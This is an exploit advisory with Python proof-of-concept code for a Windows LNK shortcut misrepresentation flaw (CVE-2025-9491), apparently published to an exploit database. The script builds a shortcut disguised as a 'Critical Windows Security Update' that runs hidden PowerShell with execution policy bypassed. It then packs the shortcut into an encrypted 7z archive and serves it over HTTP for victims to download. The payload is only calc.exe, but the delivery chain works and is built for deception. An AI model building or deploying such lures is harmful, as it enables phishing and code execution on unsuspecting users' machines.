# Title: Windows LNK File UI Misrepresentation Remote Code Execution # Date: 2025-01-04 # Exploit Author: nu11secur1ty # Vendor Homepage: https://www.microsoft.com # Software Link: N/A (Windows OS component) # Version: Windows 10, Windows 11, Windows Server 2016/2019/2022 # Tested on: Windows 10 22H2, Windows 11 23H2 # CVE: CVE-2025-9491 # CVSS: 8.8 ###Description: A critical vulnerability exists in Microsoft Windows LNK file handling that allows attackers to create malicious shortcut files that appear legitimate in Windows Explorer while executing arbitrary commands. The vulnerability is a UI misrepresentation flaw where Windows incorrectly displays file properties. ### Exploit: [href]( https://raw.githubusercontent.com/nu11secur1ty/Windows11Exploits/refs/heads/main/2025/CVE-2025-9491/Exploit/CVE-2025-9491.py ) ### Technical Details: The vulnerability allows attackers to craft LNK files with: 1. Legitimate-looking icons (document, PDF, Windows Update shield) 2. Misleading descriptions ("Security Update", "Important Document") 3. Hidden command execution in arguments field 4. Window state set to hidden (SW_SHOWMINNOACTIVE = 7) When a user opens the malicious LNK file, Windows Explorer shows it as a harmless document, but the file actually executes commands with the user's privileges. No security warnings are displayed to the user. ### Proof of Concept: An LNK file can be created that: - Shows as "Windows Security Update" with shield icon - Actually executes: cmd.exe /c powershell -Command "malicious_payload" - Runs with hidden window (WindowStyle = 7) ### The LNK file can be delivered via: 1. Email attachments 2. Network shares 3. Web downloads 4. USB devices 5. Compressed archives ### Impact: - Remote Code Execution with user privileges - No user warnings or security prompts - Complete UI deception - Easy to weaponize ### Mitigation: 1. Enable display of file extensions in Windows Explorer 2. Block .LNK file attachments at email gateways 3. Implement application control (AppLocker, WDAC) 4. Monitor for hidden process execution 5. User education about suspicious files ### Vendor Status: Microsoft has been notified. No patch available as of 2025-01-04. References: - CVE-2025-9491 - Microsoft Security Response Center Note: This information is for defensive purposes only. Unauthorized testing against systems you don't own is illegal. -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstorm.news/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.asc3t1c-nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty --- proof of concept --- #!/usr/bin/python # nu11secur1ty 2025 import os import sys import subprocess import socket import threading import pythoncom from win32com.client import Dispatch from http.server import HTTPServer, BaseHTTPRequestHandler def get_script_directory(): if getattr(sys, 'frozen', False): return os.path.dirname(sys.executable) else: return os.path.dirname(os.path.abspath(__file__)) def get_local_ip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect(('8.8.8.8', 80)) ip = s.getsockname()[0] except: ip = '0.0.0.0' finally: s.close() return ip def create_malicious_lnk(): script_dir = get_script_directory() lnk_path = os.path.join(script_dir, 'Critical_Update.lnk') print("[*] Creating malicious LNK file...") try: shell = Dispatch('WScript.Shell') shortcut = shell.CreateShortCut(lnk_path) shortcut.TargetPath = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' shortcut.Arguments = '-NoProfile -ExecutionPolicy Bypass -Command "Start-Process calc.exe; echo Windows Update Completed"' shortcut.WorkingDirectory = r'C:\Windows\System32' shortcut.Description = 'Critical Windows Security Update - KB5029244' icon_paths = [ r'C:\Windows\System32\shell32.dll', r'C:\Windows\System32\imageres.dll', ] for icon_path in icon_paths: if os.path.exists(icon_path): shortcut.IconLocation = f'{icon_path},78' break shortcut.WindowStyle = 7 shortcut.save() if os.path.exists(lnk_path): print(f"[+] LNK created: {lnk_path}") return lnk_path else: return None except Exception as e: print(f"[-] Error: {e}") return None def compress_with_7zip(lnk_path, password=None): if not lnk_path or not os.path.exists(lnk_path): print("[-] LNK file not found") return None seven_zip_paths = [ r'C:\Program Files\7-Zip\7z.exe', r'C:\Program Files (x86)\7-Zip\7z.exe', '7z.exe', '7z' ] seven_zip = None for path in seven_zip_paths: try: result = subprocess.run([path, '--help'], capture_output=True, text=True) if result.returncode == 0: seven_zip = path break except: continue if not seven_zip: print("[-] 7-Zip not found") return None archive_name = os.path.join(get_script_directory(), 'update.7z') cmd = [seven_zip, 'a', archive_name, lnk_path] if password: cmd.extend(['-p' + password]) cmd.extend(['-mx9', '-mhe=on', '-t7z']) print("[*] Compressing with 7-Zip...") try: result = subprocess.run(cmd, capture_output=True, text=True) if result.returncode == 0: print(f"[+] Archive created: {archive_name}") if password: print(f"[+] Password: {password}") return archive_name else: return None except Exception as e: print(f"[-] Compression failed: {e}") return None class FileHandler(BaseHTTPRequestHandler): def do_GET(self): if self.path == '/' or self.path == '/update.7z': file_path = 'update.7z' if os.path.exists(file_path): self.send_response(200) self.send_header('Content-type', 'application/x-7z-compressed') self.send_header('Content-Disposition', 'attachment; filename="update.7z"') with open(file_path, 'rb') as f: content = f.read() self.send_header('Content-Length', str(len(content))) self.end_headers() self.wfile.write(content) print(f"[+] CVE-2025-9491: Malicious LNK served to {self.client_address[0]}") else: self.send_error(404) else: self.send_error(404) def log_message(self, format, *args): pass def start_server(port=8080): ip = get_local_ip() print(f"[+] Starting server on http://{ip}:{port}") print(f"[+] Download URL: http://{ip}:{port}/update.7z") print("[+] Server running...") server = HTTPServer((ip, port), FileHandler) server.serve_forever() def main(): print("=" * 60) print("CVE-2025-9491 LNK Exploit + 7-Zip + HTTP Server") print("=" * 60) try: from win32com.client import Dispatch except ImportError: print("[-] Install pywin32: pip install pywin32") return # Create LNK lnk_file = create_malicious_lnk() if not lnk_file: print("[-] Failed to create LNK") return # Compress with 7-Zip print("\n[*] Compress with 7-Zip? (y/n): ", end='') compress = input().lower().strip() if compress == 'y': print("[*] Password (optional): ", end='') password = input().strip() if not password: password = None archive = compress_with_7zip(lnk_file, password) if archive: print(f"\n[+] Archive ready: {archive}") # Start HTTP server in background thread server_thread = threading.Thread(target=start_server, daemon=True) server_thread.start() ip = get_local_ip() print(f"\n[+] Server started at http://{ip}:8080") print(f"[+] Download: http://{ip}:8080/update.7z") print("\n[+] PowerShell download command:") print(f' iwr http://{ip}:8080/update.7z -OutFile update.7z') # Keep main thread alive try: while True: time.sleep(1) except KeyboardInterrupt: print("\n[*] Shutting down...") else: print("[-] Compression failed") print(f"[*] Use raw LNK: {lnk_file}") else: print(f"\n[*] Raw LNK file: {lnk_file}") if __name__ == "__main__": import time main()